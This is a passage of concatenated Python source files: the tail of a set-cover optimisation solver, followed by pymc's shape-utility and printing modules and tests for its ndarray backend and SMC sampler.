solver.Add(sum(u[x] for x in p.sets[i]) <= float(p.cost[i]))
solver.Maximize(sum(u))
status = solver.Solve()
assert status == pywraplp.Solver.OPTIMAL
return [ux.solution_value() for ux in u]
def get_relative_cost(p, dsol):
"""
Calculate relative cost
Parameters
----------
p : Problem
dsol : np.ndarray of float
solution of the dual of linear relaxation problem
Returns
-------
rcost : np.array of float
relative cost
"""
rcost = np.array(p.cost, dtype=np.float)
for i in range(p.m):
for x in p.sets[i]:
rcost[i] -= dsol[x]
return rcost
def solve_by_mip(p, time_limit=600, silent=True, bind=None):
"""Solve by MIPCL"""
mpprob = mp.Problem("setcover")
x = [mp.Var("x(%d)" % i, type=mp.BIN) for i in range(p.m)]
mp.minimize(mp.sum_([int(p.cost[i]) * x[i] for i in range(p.m)]))
for i in range(p.n):
mp.sum_([x[j] for j in range(p.m) if i in p.sets[j]]) >= 1
if bind is not None:
for i in bind:
x[i] == bind[i]
mp.optimize(silent=silent, timeLimit=time_limit)
sol = np.zeros(p.m, dtype=np.int)
for i in range(p.m):
if x[i].val > 0.5:
sol[i] = 1
assert p.is_feasible(sol)
return sol
def solve_it(input_data):
# parse input_data and create problem
p_org = Problem(input_data)
# Reduce the size of the problem
red = Reducer(p_org)
p = red.reduced_p
# Calculate a solution of the linear relaxation problem
# and calculate relative cost
dsol = get_dual_solution(p)
rcost = get_relative_cost(p, dsol)
# Fix some columns(sets) to use
e2s = defaultdict(list)
for i in range(p.m):
for x in p.sets[i]:
e2s[x].append(i)
free_cols = set()
for x in e2s:
tmp = sorted(e2s[x], key=lambda i: p.cost[i])
for i in tmp[:1]:
free_cols.add(i)
for i in range(p.m):
if rcost[i] <= 0.01:
free_cols.add(i)
# the sets in bind are not used
bind = {i: 0 for i in range(p.m) if i not in free_cols}
# solve by mipcl
sol = solve_by_mip(p, bind=bind)
# convert to solution of original problem
sol_org = red.get_original_solution(sol)
assert(p_org.is_feasible(sol_org))
obj = p_org.objective(sol_org)
# make output text
output_data = "%d %d\n" % (obj, 0)
output_data += " ".join(map(str, sol_org))
return output_data
if __name__ == '__main__':
import sys
if len(sys.argv) > 1:
file_location = sys.argv[1].strip()
with open(file_location, 'r') as input_data_file:
input_data = input_data_file.read()
print(solve_it(input_data))
else:
print('This test requires an input file. Please select one from the data directory. (i.e. python solver.py ./data/sc_6_1)')
``` |
{
"source": "5hv5hvnk/pymc",
"score": 2
} |
#### File: pymc/distributions/shape_utils.py
```python
from typing import TYPE_CHECKING, Optional, Sequence, Tuple, Union, cast
import numpy as np
from aesara.graph.basic import Variable
from aesara.tensor.var import TensorVariable
from typing_extensions import TypeAlias
from pymc.aesaraf import pandas_to_array
__all__ = [
"to_tuple",
"shapes_broadcasting",
"broadcast_dist_samples_shape",
"get_broadcastable_dist_samples",
"broadcast_distribution_samples",
"broadcast_dist_samples_to",
"rv_size_is_none",
]
def to_tuple(shape):
"""Convert ints, arrays, and Nones to tuples
Parameters
----------
shape: None, int or array-like
Represents the shape to convert to tuple.
Returns
-------
If `shape` is None, returns an empty tuple. If it's an int, (shape,) is
returned. If it is array-like, tuple(shape) is returned.
"""
if shape is None:
return tuple()
temp = np.atleast_1d(shape)
if temp.size == 0:
return tuple()
else:
return tuple(temp)
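# Hedged examples of to_tuple (not part of the original module); elements of array-like
# inputs come back as numpy scalars:
#   to_tuple(None)          -> ()
#   to_tuple(5)             -> (5,)
#   to_tuple([2, 3])        -> (2, 3)
#   to_tuple(np.array([]))  -> ()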
def _check_shape_type(shape):
out = []
try:
shape = np.atleast_1d(shape)
for s in shape:
if isinstance(s, np.ndarray) and s.ndim > 0:
raise TypeError(f"Value {s} is not a valid integer")
o = int(s)
if o != s:
raise TypeError(f"Value {s} is not a valid integer")
out.append(o)
except Exception:
raise TypeError(f"Supplied value {shape} does not represent a valid shape")
return tuple(out)
def shapes_broadcasting(*args, raise_exception=False):
"""Return the shape resulting from broadcasting multiple shapes.
Represents numpy's broadcasting rules.
Parameters
----------
*args: array-like of int
Tuples or arrays or lists representing the shapes of arrays to be
broadcast.
raise_exception: bool (optional)
Controls whether to raise an exception or simply return `None` if
the broadcasting fails.
Returns
-------
Resulting shape. If broadcasting is not possible and `raise_exception` is
False, then `None` is returned. If `raise_exception` is `True`, a
`ValueError` is raised.
"""
x = list(_check_shape_type(args[0])) if args else ()
for arg in args[1:]:
y = list(_check_shape_type(arg))
if len(x) < len(y):
x, y = y, x
if len(y) > 0:
x[-len(y) :] = [
j if i == 1 else i if j == 1 else i if i == j else 0
for i, j in zip(x[-len(y) :], y)
]
if not all(x):
if raise_exception:
raise ValueError(
"Supplied shapes {} do not broadcast together".format(
", ".join([f"{a}" for a in args])
)
)
else:
return None
return tuple(x)
def broadcast_dist_samples_shape(shapes, size=None):
"""Apply shape broadcasting to shape tuples but assuming that the shapes
correspond to draws from random variables, with the `size` tuple possibly
prepended to it. The `size` prepend is ignored to consider if the supplied
`shapes` can broadcast or not. It is prepended to the resulting broadcasted
`shapes`, if any of the shape tuples had the `size` prepend.
Parameters
----------
shapes: Iterable of tuples holding the distribution samples shapes
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
tuple of the resulting shape
Examples
--------
.. code-block:: python
size = 100
shape0 = (size,)
shape1 = (size, 5)
shape2 = (size, 4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (size, 4, 5)
.. code-block:: python
size = 100
shape0 = (size,)
shape1 = (5,)
shape2 = (4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (size, 4, 5)
.. code-block:: python
size = 100
shape0 = (1,)
shape1 = (5,)
shape2 = (4, 5)
out = broadcast_dist_samples_shape([shape0, shape1, shape2],
size=size)
assert out == (4, 5)
"""
if size is None:
broadcasted_shape = shapes_broadcasting(*shapes)
if broadcasted_shape is None:
raise ValueError(
"Cannot broadcast provided shapes {} given size: {}".format(
", ".join([f"{s}" for s in shapes]), size
)
)
return broadcasted_shape
shapes = [_check_shape_type(s) for s in shapes]
_size = to_tuple(size)
# samples shapes without the size prepend
sp_shapes = [s[len(_size) :] if _size == s[: min([len(_size), len(s)])] else s for s in shapes]
try:
broadcast_shape = shapes_broadcasting(*sp_shapes, raise_exception=True)
except ValueError:
raise ValueError(
"Cannot broadcast provided shapes {} given size: {}".format(
", ".join([f"{s}" for s in shapes]), size
)
)
broadcastable_shapes = []
for shape, sp_shape in zip(shapes, sp_shapes):
if _size == shape[: len(_size)]:
# If size prepends the shape, then we have to add broadcasting axis
# in the middle
p_shape = (
shape[: len(_size)]
+ (1,) * (len(broadcast_shape) - len(sp_shape))
+ shape[len(_size) :]
)
else:
p_shape = shape
broadcastable_shapes.append(p_shape)
return shapes_broadcasting(*broadcastable_shapes, raise_exception=True)
def get_broadcastable_dist_samples(
samples, size=None, must_bcast_with=None, return_out_shape=False
):
"""Get a view of the samples drawn from distributions which adds new axises
in between the `size` prepend and the distribution's `shape`. These views
    should be able to broadcast the samples from the distributions taking into
account the `size` (i.e. the number of samples) of the draw, which is
prepended to the sample's `shape`. Optionally, one can supply an extra
`must_bcast_with` to try to force samples to be able to broadcast with a
given shape. A `ValueError` is raised if it is not possible to broadcast
the provided samples.
Parameters
----------
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
must_bcast_with: None, int or tuple (optional)
Tuple shape to which the samples must be able to broadcast
return_out_shape: bool (optional)
If `True`, this function also returns the output's shape and not only
samples views.
Returns
-------
broadcastable_samples: List of the broadcasted sample arrays
broadcast_shape: If `return_out_shape` is `True`, the resulting broadcast
shape is returned.
Examples
--------
.. code-block:: python
must_bcast_with = (3, 1, 5)
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_dist_samples_to(
[sample0, sample1, sample2],
size=size,
must_bcast_with=must_bcast_with,
)
assert out[0].shape == (size, 1, 1, 1)
assert out[1].shape == (size, 1, 1, 5)
assert out[2].shape == (size, 1, 4, 5)
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1[:, None, None] == out[1])
assert np.all(sample2[:, None] == out[2])
.. code-block:: python
size = 100
must_bcast_with = (3, 1, 5)
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_dist_samples_to(
[sample0, sample1, sample2],
size=size,
must_bcast_with=must_bcast_with,
)
assert out[0].shape == (size, 1, 1, 1)
assert out[1].shape == (5,)
assert out[2].shape == (4, 5)
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
samples = [np.asarray(p) for p in samples]
_size = to_tuple(size)
must_bcast_with = to_tuple(must_bcast_with)
# Raw samples shapes
p_shapes = [p.shape for p in samples] + [_check_shape_type(must_bcast_with)]
out_shape = broadcast_dist_samples_shape(p_shapes, size=size)
# samples shapes without the size prepend
sp_shapes = [
s[len(_size) :] if _size == s[: min([len(_size), len(s)])] else s for s in p_shapes
]
broadcast_shape = shapes_broadcasting(*sp_shapes, raise_exception=True)
broadcastable_samples = []
for param, p_shape, sp_shape in zip(samples, p_shapes, sp_shapes):
if _size == p_shape[: min([len(_size), len(p_shape)])]:
# If size prepends the shape, then we have to add broadcasting axis
# in the middle
slicer_head = [slice(None)] * len(_size)
slicer_tail = [np.newaxis] * (len(broadcast_shape) - len(sp_shape)) + [
slice(None)
] * len(sp_shape)
else:
# If size does not prepend the shape, then we have leave the
# parameter as is
slicer_head = []
slicer_tail = [slice(None)] * len(sp_shape)
broadcastable_samples.append(param[tuple(slicer_head + slicer_tail)])
if return_out_shape:
return broadcastable_samples, out_shape
else:
return broadcastable_samples
def broadcast_distribution_samples(samples, size=None):
"""Broadcast samples drawn from distributions taking into account the
size (i.e. the number of samples) of the draw, which is prepended to
the sample's shape.
Parameters
----------
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
List of broadcasted sample arrays
Examples
--------
.. code-block:: python
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_distribution_samples([sample0, sample1, sample2],
size=size)
assert all((o.shape == (size, 4, 5) for o in out))
assert np.all(sample0[:, None, None] == out[0])
assert np.all(sample1[:, None, :] == out[1])
assert np.all(sample2 == out[2])
.. code-block:: python
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_distribution_samples([sample0, sample1, sample2],
size=size)
assert all((o.shape == (size, 4, 5) for o in out))
assert np.all(sample0[:, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
return np.broadcast_arrays(*get_broadcastable_dist_samples(samples, size=size))
def broadcast_dist_samples_to(to_shape, samples, size=None):
"""Broadcast samples drawn from distributions to a given shape, taking into
account the size (i.e. the number of samples) of the draw, which is
prepended to the sample's shape.
Parameters
----------
to_shape: Tuple shape onto which the samples must be able to broadcast
samples: Iterable of ndarrays holding the sampled values
size: None, int or tuple (optional)
size of the sample set requested.
Returns
-------
List of the broadcasted sample arrays
Examples
--------
.. code-block:: python
to_shape = (3, 1, 5)
size = 100
sample0 = np.random.randn(size)
sample1 = np.random.randn(size, 5)
sample2 = np.random.randn(size, 4, 5)
out = broadcast_dist_samples_to(
to_shape,
[sample0, sample1, sample2],
size=size
)
assert np.all((o.shape == (size, 3, 4, 5) for o in out))
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1[:, None, None] == out[1])
assert np.all(sample2[:, None] == out[2])
.. code-block:: python
size = 100
to_shape = (3, 1, 5)
sample0 = np.random.randn(size)
sample1 = np.random.randn(5)
sample2 = np.random.randn(4, 5)
out = broadcast_dist_samples_to(
to_shape,
[sample0, sample1, sample2],
size=size
)
assert np.all((o.shape == (size, 3, 4, 5) for o in out))
assert np.all(sample0[:, None, None, None] == out[0])
assert np.all(sample1 == out[1])
assert np.all(sample2 == out[2])
"""
samples, to_shape = get_broadcastable_dist_samples(
samples, size=size, must_bcast_with=to_shape, return_out_shape=True
)
return [np.broadcast_to(o, to_shape) for o in samples]
# Workaround to annotate the Ellipsis type, posted by the BDFL himself.
# See https://github.com/python/typing/issues/684#issuecomment-548203158
if TYPE_CHECKING:
from enum import Enum
class ellipsis(Enum):
Ellipsis = "..."
Ellipsis = ellipsis.Ellipsis
else:
ellipsis = type(Ellipsis)
# User-provided can be lazily specified as scalars
Shape: TypeAlias = Union[int, TensorVariable, Sequence[Union[int, Variable, ellipsis]]]
Dims: TypeAlias = Union[str, Sequence[Optional[Union[str, ellipsis]]]]
Size: TypeAlias = Union[int, TensorVariable, Sequence[Union[int, Variable]]]
# After conversion to vectors
WeakShape: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable, ellipsis], ...]]
WeakDims: TypeAlias = Tuple[Optional[Union[str, ellipsis]], ...]
# After Ellipsis were substituted
StrongShape: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable], ...]]
StrongDims: TypeAlias = Sequence[Optional[str]]
StrongSize: TypeAlias = Union[TensorVariable, Tuple[Union[int, Variable], ...]]
def convert_dims(dims: Optional[Dims]) -> Optional[WeakDims]:
"""Process a user-provided dims variable into None or a valid dims tuple."""
if dims is None:
return None
if isinstance(dims, str):
dims = (dims,)
elif isinstance(dims, (list, tuple)):
dims = tuple(dims)
else:
raise ValueError(f"The `dims` parameter must be a tuple, str or list. Actual: {type(dims)}")
if any(d == Ellipsis for d in dims[:-1]):
raise ValueError(f"Ellipsis in `dims` may only appear in the last position. Actual: {dims}")
return dims
def convert_shape(shape: Shape) -> Optional[WeakShape]:
"""Process a user-provided shape variable into None or a valid shape object."""
if shape is None:
return None
elif isinstance(shape, int) or (isinstance(shape, TensorVariable) and shape.ndim == 0):
shape = (shape,)
elif isinstance(shape, TensorVariable) and shape.ndim == 1:
shape = tuple(shape)
elif isinstance(shape, (list, tuple)):
shape = tuple(shape)
else:
raise ValueError(
f"The `shape` parameter must be a tuple, TensorVariable, int or list. Actual: {type(shape)}"
)
if isinstance(shape, tuple) and any(s == Ellipsis for s in shape[:-1]):
raise ValueError(
f"Ellipsis in `shape` may only appear in the last position. Actual: {shape}"
)
return shape
def convert_size(size: Size) -> Optional[StrongSize]:
"""Process a user-provided size variable into None or a valid size object."""
if size is None:
return None
elif isinstance(size, int) or (isinstance(size, TensorVariable) and size.ndim == 0):
size = (size,)
elif isinstance(size, TensorVariable) and size.ndim == 1:
size = tuple(size)
elif isinstance(size, (list, tuple)):
size = tuple(size)
else:
raise ValueError(
f"The `size` parameter must be a tuple, TensorVariable, int or list. Actual: {type(size)}"
)
if isinstance(size, tuple) and Ellipsis in size:
raise ValueError(f"The `size` parameter cannot contain an Ellipsis. Actual: {size}")
return size
def resize_from_dims(dims: WeakDims, ndim_implied: int, model) -> Tuple[StrongSize, StrongDims]:
"""Determines a potential resize shape from a `dims` tuple.
Parameters
----------
dims : array-like
A vector of dimension names, None or Ellipsis.
ndim_implied : int
Number of RV dimensions that were implied from its inputs alone.
model : pm.Model
The current model on stack.
Returns
-------
resize_shape : array-like
Shape of new dimensions that should be prepended.
dims : tuple of (str or None)
Names or None for all dimensions after resizing.
"""
if Ellipsis in dims:
# Auto-complete the dims tuple to the full length.
# We don't have a way to know the names of implied
# dimensions, so they will be `None`.
dims = (*dims[:-1], *[None] * ndim_implied)
sdims = cast(StrongDims, dims)
ndim_resize = len(sdims) - ndim_implied
# All resize dims must be known already (numerically or symbolically).
unknowndim_resize_dims = set(sdims[:ndim_resize]) - set(model.dim_lengths)
if unknowndim_resize_dims:
raise KeyError(
f"Dimensions {unknowndim_resize_dims} are unknown to the model and cannot be used to specify a `size`."
)
# The numeric/symbolic resize tuple can be created using model.RV_dim_lengths
resize_shape: Tuple[Variable, ...] = tuple(
model.dim_lengths[dname] for dname in sdims[:ndim_resize]
)
return resize_shape, sdims
def resize_from_observed(
observed, ndim_implied: int
) -> Tuple[StrongSize, Union[np.ndarray, Variable]]:
"""Determines a potential resize shape from observations.
Parameters
----------
observed : scalar, array-like
The value of the `observed` kwarg to the RV creation.
ndim_implied : int
Number of RV dimensions that were implied from its inputs alone.
Returns
-------
resize_shape : array-like
Shape of new dimensions that should be prepended.
observed : scalar, array-like
Observations as numpy array or `Variable`.
"""
if not hasattr(observed, "shape"):
observed = pandas_to_array(observed)
ndim_resize = observed.ndim - ndim_implied
resize_shape = tuple(observed.shape[d] for d in range(ndim_resize))
return resize_shape, observed
def find_size(
shape: Optional[WeakShape],
size: Optional[StrongSize],
ndim_supp: int,
) -> Tuple[Optional[StrongSize], Optional[int], Optional[int], int]:
"""Determines the size keyword argument for creating a Distribution.
Parameters
----------
shape
A tuple specifying the final shape of a distribution
size
A tuple specifying the size of a distribution
ndim_supp : int
The support dimension of the distribution.
0 if a univariate distribution, 1 or higher for multivariate distributions.
Returns
-------
create_size : int, optional
The size argument to be passed to the distribution
ndim_expected : int, optional
Number of dimensions expected after distribution was created
ndim_batch : int, optional
Number of batch dimensions
ndim_supp : int
Number of support dimensions
"""
ndim_expected: Optional[int] = None
ndim_batch: Optional[int] = None
create_size: Optional[StrongSize] = None
if shape is not None:
if Ellipsis in shape:
# Ellipsis short-hands all implied dimensions. Therefore
# we don't know how many dimensions to expect.
ndim_expected = ndim_batch = None
# Create the RV with its implied shape and resize later
create_size = None
else:
ndim_expected = len(tuple(shape))
ndim_batch = ndim_expected - ndim_supp
create_size = tuple(shape)[:ndim_batch]
elif size is not None:
ndim_expected = ndim_supp + len(tuple(size))
ndim_batch = ndim_expected - ndim_supp
create_size = size
return create_size, ndim_expected, ndim_batch, ndim_supp
def rv_size_is_none(size: Variable) -> bool:
"""Check wether an rv size is None (ie., at.Constant([]))"""
return size.type.shape == (0,) # type: ignore [attr-defined]
```
#### File: pymc/pymc/printing.py
```python
import itertools
from typing import Union
from aesara.graph.basic import walk
from aesara.tensor.basic import TensorVariable, Variable
from aesara.tensor.elemwise import DimShuffle
from aesara.tensor.random.basic import RandomVariable
from aesara.tensor.var import TensorConstant
from pymc.model import Model
__all__ = [
"str_for_dist",
"str_for_model",
"str_for_potential_or_deterministic",
]
def str_for_dist(rv: TensorVariable, formatting: str = "plain", include_params: bool = True) -> str:
"""Make a human-readable string representation of a RandomVariable in a model, either
LaTeX or plain, optionally with distribution parameter values included."""
if include_params:
# first 3 args are always (rng, size, dtype), rest is relevant for distribution
dist_args = [_str_for_input_var(x, formatting=formatting) for x in rv.owner.inputs[3:]]
print_name = rv.name if rv.name is not None else "<unnamed>"
if "latex" in formatting:
print_name = r"\text{" + _latex_escape(print_name) + "}"
dist_name = rv.owner.op._print_name[1]
if include_params:
return r"${} \sim {}({})$".format(print_name, dist_name, ",~".join(dist_args))
else:
return rf"${print_name} \sim {dist_name}$"
else: # plain
dist_name = rv.owner.op._print_name[0]
if include_params:
return r"{} ~ {}({})".format(print_name, dist_name, ", ".join(dist_args))
else:
return rf"{print_name} ~ {dist_name}"
def str_for_model(model: Model, formatting: str = "plain", include_params: bool = True) -> str:
"""Make a human-readable string representation of Model, listing all random variables
and their distributions, optionally including parameter values."""
all_rv = itertools.chain(model.unobserved_RVs, model.observed_RVs, model.potentials)
rv_reprs = [rv.str_repr(formatting=formatting, include_params=include_params) for rv in all_rv]
rv_reprs = [rv_repr for rv_repr in rv_reprs if "TransformedDistribution()" not in rv_repr]
if not rv_reprs:
return ""
if "latex" in formatting:
rv_reprs = [
rv_repr.replace(r"\sim", r"&\sim &").strip("$")
for rv_repr in rv_reprs
if rv_repr is not None
]
return r"""$$
\begin{{array}}{{rcl}}
{}
\end{{array}}
$$""".format(
"\\\\".join(rv_reprs)
)
else:
# align vars on their ~
names = [s[: s.index("~") - 1] for s in rv_reprs]
distrs = [s[s.index("~") + 2 :] for s in rv_reprs]
maxlen = str(max(len(x) for x in names))
rv_reprs = [
("{name:>" + maxlen + "} ~ {distr}").format(name=n, distr=d)
for n, d in zip(names, distrs)
]
return "\n".join(rv_reprs)
def str_for_potential_or_deterministic(
var: TensorVariable,
formatting: str = "plain",
include_params: bool = True,
dist_name: str = "Deterministic",
) -> str:
"""Make a human-readable string representation of a Deterministic or Potential in a model, either
LaTeX or plain, optionally with distribution parameter values included."""
print_name = var.name if var.name is not None else "<unnamed>"
if "latex" in formatting:
print_name = r"\text{" + _latex_escape(print_name) + "}"
if include_params:
return rf"${print_name} \sim \operatorname{{{dist_name}}}({_str_for_expression(var, formatting=formatting)})$"
else:
return rf"${print_name} \sim \operatorname{{{dist_name}}}$"
else: # plain
if include_params:
return rf"{print_name} ~ {dist_name}({_str_for_expression(var, formatting=formatting)})"
else:
return rf"{print_name} ~ {dist_name}"
def _str_for_input_var(var: Variable, formatting: str) -> str:
    def _is_potential_or_deterministic(var: Variable) -> bool:
try:
return var.str_repr.__func__.func is str_for_potential_or_deterministic
except AttributeError:
# in case other code overrides str_repr, fallback
return False
if isinstance(var, TensorConstant):
return _str_for_constant(var, formatting)
    elif isinstance(var.owner.op, RandomVariable) or _is_potential_or_deterministic(var):
# show the names for RandomVariables, Deterministics, and Potentials, rather
# than the full expression
return _str_for_input_rv(var, formatting)
elif isinstance(var.owner.op, DimShuffle):
return _str_for_input_var(var.owner.inputs[0], formatting)
else:
return _str_for_expression(var, formatting)
def _str_for_input_rv(var: Variable, formatting: str) -> str:
_str = var.name if var.name is not None else "<unnamed>"
if "latex" in formatting:
return r"\text{" + _latex_escape(_str) + "}"
else:
return _str
def _str_for_constant(var: TensorConstant, formatting: str) -> str:
if len(var.data.shape) == 0:
return f"{var.data:.3g}"
elif len(var.data.shape) == 1 and var.data.shape[0] == 1:
return f"{var.data[0]:.3g}"
elif "latex" in formatting:
return r"\text{<constant>}"
else:
return r"<constant>"
def _str_for_expression(var: Variable, formatting: str) -> str:
# construct a string like f(a1, ..., aN) listing all random variables a as arguments
def _expand(x):
if x.owner and (not isinstance(x.owner.op, RandomVariable)):
return reversed(x.owner.inputs)
parents = [
x
for x in walk(nodes=var.owner.inputs, expand=_expand)
if x.owner and isinstance(x.owner.op, RandomVariable)
]
names = [x.name for x in parents]
if "latex" in formatting:
return r"f(" + ",~".join([r"\text{" + _latex_escape(n) + "}" for n in names]) + ")"
else:
return r"f(" + ", ".join(names) + ")"
def _latex_escape(text: str) -> str:
# Note that this is *NOT* a proper LaTeX escaper, on purpose. _repr_latex_ is
# primarily used in the context of Jupyter notebooks, which render using MathJax.
# MathJax is a subset of LaTeX proper, which expects only $ to be escaped. If we were
# to also escape e.g. _ (replace with \_), then "\_" will show up in the output, etc.
return text.replace("$", r"\$")
def _default_repr_pretty(obj: Union[TensorVariable, Model], p, cycle):
"""Handy plug-in method to instruct IPython-like REPLs to use our str_repr above."""
# we know that our str_repr does not recurse, so we can ignore cycle
try:
output = obj.str_repr()
# Find newlines and replace them with p.break_()
# (see IPython.lib.pretty._repr_pprint)
lines = output.splitlines()
with p.group():
for idx, output_line in enumerate(lines):
if idx:
p.break_()
p.text(output_line)
except AttributeError:
# the default fallback option (no str_repr method)
IPython.lib.pretty._repr_pprint(obj, p, cycle)
try:
# register our custom pretty printer in ipython shells
import IPython
IPython.lib.pretty.for_type(TensorVariable, _default_repr_pretty)
IPython.lib.pretty.for_type(Model, _default_repr_pretty)
except (ModuleNotFoundError, AttributeError):
# no ipython shell
pass
```
#### File: pymc/tests/test_ndarray_backend.py
```python
import numpy as np
import numpy.testing as npt
import pytest
from pymc.backends import base, ndarray
from pymc.tests import backend_fixtures as bf
STATS1 = [{"a": np.float64, "b": bool}]
STATS2 = [
{"a": np.float64},
{
"a": np.float64,
"b": np.int64,
},
]
class TestNDArray0dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = ()
class TestNDArray0dSamplingStats1(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
sampler_vars = STATS1
shape = ()
class TestNDArray0dSamplingStats2(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
sampler_vars = STATS2
shape = ()
class TestNDArray1dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = 2
class TestNDArray2dSampling(bf.SamplingTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestNDArrayStats(bf.StatsTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestNDArray0dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS1
class TestNDArray0dSelection2(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS2
class TestNDArray0dSelectionStats1(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
sampler_vars = STATS2
class TestNDArray0dSelectionStats2(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = ()
class TestNDArray1dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = 2
class TestNDArray2dSelection(bf.SelectionTestCase):
backend = ndarray.NDArray
name = None
shape = (2, 3)
class TestMultiTrace(bf.ModelBackendSetupTestCase):
name = None
backend = ndarray.NDArray
shape = ()
def setup_method(self):
super().setup_method()
self.strace0 = self.strace
super().setup_method()
self.strace1 = self.strace
def test_multitrace_nonunique(self):
with pytest.raises(ValueError):
base.MultiTrace([self.strace0, self.strace1])
def test_merge_traces_no_traces(self):
with pytest.raises(ValueError):
base.merge_traces([])
def test_merge_traces_diff_lengths(self):
with self.model:
strace0 = self.backend(self.name)
strace0.setup(self.draws, 1)
for i in range(self.draws):
strace0.record(self.test_point)
strace0.close()
mtrace0 = base.MultiTrace([self.strace0])
with self.model:
strace1 = self.backend(self.name)
strace1.setup(2 * self.draws, 1)
for i in range(2 * self.draws):
strace1.record(self.test_point)
strace1.close()
mtrace1 = base.MultiTrace([strace1])
with pytest.raises(ValueError):
base.merge_traces([mtrace0, mtrace1])
def test_merge_traces_nonunique(self):
mtrace0 = base.MultiTrace([self.strace0])
mtrace1 = base.MultiTrace([self.strace1])
with pytest.raises(ValueError):
base.merge_traces([mtrace0, mtrace1])
class TestMultiTrace_add_remove_values(bf.ModelBackendSampledTestCase):
name = None
backend = ndarray.NDArray
shape = ()
def test_add_values(self):
mtrace = self.mtrace
orig_varnames = list(mtrace.varnames)
name = "new_var"
vals = mtrace[orig_varnames[0]]
mtrace.add_values({name: vals})
assert len(orig_varnames) == len(mtrace.varnames) - 1
assert name in mtrace.varnames
assert np.all(mtrace[orig_varnames[0]] == mtrace[name])
mtrace.remove_values(name)
assert len(orig_varnames) == len(mtrace.varnames)
assert name not in mtrace.varnames
class TestSqueezeCat:
def setup_method(self):
self.x = np.arange(10)
self.y = np.arange(10, 20)
def test_combine_false_squeeze_false(self):
expected = [self.x, self.y]
result = base._squeeze_cat([self.x, self.y], False, False)
npt.assert_equal(result, expected)
def test_combine_true_squeeze_false(self):
expected = [np.concatenate([self.x, self.y])]
result = base._squeeze_cat([self.x, self.y], True, False)
npt.assert_equal(result, expected)
def test_combine_false_squeeze_true_more_than_one_item(self):
expected = [self.x, self.y]
result = base._squeeze_cat([self.x, self.y], False, True)
npt.assert_equal(result, expected)
def test_combine_false_squeeze_true_one_item(self):
expected = self.x
result = base._squeeze_cat([self.x], False, True)
npt.assert_equal(result, expected)
def test_combine_true_squeeze_true(self):
expected = np.concatenate([self.x, self.y])
result = base._squeeze_cat([self.x, self.y], True, True)
npt.assert_equal(result, expected)
```
#### File: pymc/tests/test_smc.py
```python
import aesara
import aesara.tensor as at
import numpy as np
import pytest
import scipy.stats as st
from aesara.graph.basic import ancestors
from aesara.tensor.random.op import RandomVariable
from aesara.tensor.random.var import (
RandomGeneratorSharedVariable,
RandomStateSharedVariable,
)
from aesara.tensor.sort import SortOp
from arviz.data.inference_data import InferenceData
import pymc as pm
from pymc.aesaraf import floatX
from pymc.backends.base import MultiTrace
from pymc.smc.smc import IMH
from pymc.tests.helpers import SeededTest, assert_random_state_equal
class TestSMC(SeededTest):
"""Tests for the default SMC kernel"""
def setup_class(self):
super().setup_class()
self.samples = 1000
n = 4
mu1 = np.ones(n) * 0.5
mu2 = -mu1
stdev = 0.1
sigma = np.power(stdev, 2) * np.eye(n)
isigma = np.linalg.inv(sigma)
dsigma = np.linalg.det(sigma)
w1 = stdev
w2 = 1 - stdev
def two_gaussians(x):
"""
Mixture of gaussians likelihood
"""
log_like1 = (
-0.5 * n * at.log(2 * np.pi)
- 0.5 * at.log(dsigma)
- 0.5 * (x - mu1).T.dot(isigma).dot(x - mu1)
)
log_like2 = (
-0.5 * n * at.log(2 * np.pi)
- 0.5 * at.log(dsigma)
- 0.5 * (x - mu2).T.dot(isigma).dot(x - mu2)
)
return at.log(w1 * at.exp(log_like1) + w2 * at.exp(log_like2))
with pm.Model() as self.SMC_test:
X = pm.Uniform("X", lower=-2, upper=2.0, shape=n)
llk = pm.Potential("muh", two_gaussians(X))
self.muref = mu1
with pm.Model() as self.fast_model:
x = pm.Normal("x", 0, 1)
y = pm.Normal("y", x, 1, observed=0)
def test_sample(self):
initial_rng_state = np.random.get_state()
with self.SMC_test:
mtrace = pm.sample_smc(draws=self.samples, return_inferencedata=False)
# Verify sampling was done with a non-global random generator
assert_random_state_equal(initial_rng_state, np.random.get_state())
x = mtrace["X"]
mu1d = np.abs(x).mean(axis=0)
np.testing.assert_allclose(self.muref, mu1d, rtol=0.0, atol=0.03)
def test_discrete_rounding_proposal(self):
"""
Test that discrete variable values are automatically rounded
in SMC logp functions
"""
with pm.Model() as m:
z = pm.Bernoulli("z", p=0.7)
like = pm.Potential("like", z * 1.0)
smc = IMH(model=m)
smc.initialize_population()
smc._initialize_kernel()
assert smc.prior_logp_func(floatX(np.array([-0.51]))) == -np.inf
